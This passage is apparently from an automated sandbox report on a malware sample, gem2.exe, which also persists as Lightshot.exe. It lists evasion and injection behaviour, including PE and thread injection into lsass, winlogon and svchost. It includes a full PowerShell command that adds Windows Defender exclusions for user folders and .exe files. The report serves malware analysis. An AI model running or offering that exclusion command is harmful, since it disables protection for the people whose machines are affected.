          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF72A7B118B
          Source: C:\Users\user\Desktop\gem2.exeCode function: 0_2_00007FF72A7B11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF72A7B11D8
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001E858987D90
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001E85898D2A4
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000140AE867D90
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000140AE86D2A4
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D8118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,37_2_00007FF6E4D8118B
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: 37_2_00007FF6E4D811D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,37_2_00007FF6E4D811D8
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000195DD5CD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000195DD5C7D90
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001160CBED2A4
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000001160CBE7D90
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000257E10AD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000257E10A7D90
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C937D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001F28C937D90
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001F28C93D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CA9854D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA98547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001CA98547D90
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D265317D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001D265317D90
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001D26531D2A4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CB80000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160CBB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DCA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 1200000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20E3F2F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B9EDBC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000 protect: page execute and read and write
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,23_2_0000000140001C88
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 5895273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DD59273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 589B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE89273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE1A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CBB273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E107273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A27A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87DA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FB3C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 567273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C1F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E3BC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3895273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E56273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FF7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F35273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7957273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A46273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1311273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C58273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5F1D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D9C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEC9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC1B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8253273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66EB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD9A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEDB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4279273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DCA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7373273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA54273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CCC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39D9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA39273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B727273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E88A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 77B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D34273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B5E1273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5999273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53C2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41D4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ADAD273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 307273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 120273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C528273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76AA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1B3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F34F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE4D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7452273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9D0273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF8C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D893273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E93273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4412273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97E3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC87273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 698D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34C5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 362A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3F2F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A091273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC7B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EDBC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF1A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F91273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B67273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BA2273C
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB80000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CBB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
